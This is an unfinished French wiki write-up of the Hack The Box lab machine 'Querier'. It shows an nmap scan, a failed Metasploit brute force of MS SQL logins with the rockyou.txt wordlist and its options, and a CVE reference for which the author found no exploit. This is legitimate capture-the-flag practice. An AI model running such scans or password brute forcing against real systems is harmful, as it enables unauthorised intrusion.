====== HTB ~~ Machines ~~ Querier (en cours) ======
[[htb|Retour]]
**Querier - Windows - 10.10.10.125**
**Ports ouverts :**
nmap -sV -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 06:01 UTC
Strange read error from 10.10.10.125 (71 - 'Protocol error')
Nmap scan report for ip-10-10-10-125.us-east-2.compute.internal (10.10.10.125)
Host is up (0.13s latency).
Not shown: 65075 closed ports, 445 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
53537/tcp open tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36410.39 seconds
''1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000'' indique un MS SQL Server, version 2017 si on se réfère à ce [[http://www.sqldata.fr/versions/microsoft-sql-server-versions-et-services-pack-2000-2005-2008-r2-2012.html|lien]].
Tentative bruteforce compte ''sa'' n'aboutit pas mais la VM a peut-être été reset entre deux :
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lagorda (Incorrect: )
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lafayette (Unable to Connect: )
[-] 10.10.10.125:1433 - 10.10.10.125:1433 - LOGIN FAILED: WORKSTATION\sa:lacrosse1 (Unable to Connect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mssql/mssql_login) >
Je relance une tentative bruteforce avec quelques paramètres différents pour voir :
msf auxiliary(scanner/mssql/mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /home/ec2-user/rockyou.txt no File containing passwords, one per line
RHOSTS 10.10.10.125 yes The target address range or CIDR identifier
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 10 yes The number of concurrent threads
USERNAME administrator no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT true yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/mssql/mssql_login) > exploit
**CVE**
[[https://www.cvedetails.com/cve/CVE-2018-8273/]]
Je n'ai pas trouvé d'exploit pour cette CVE.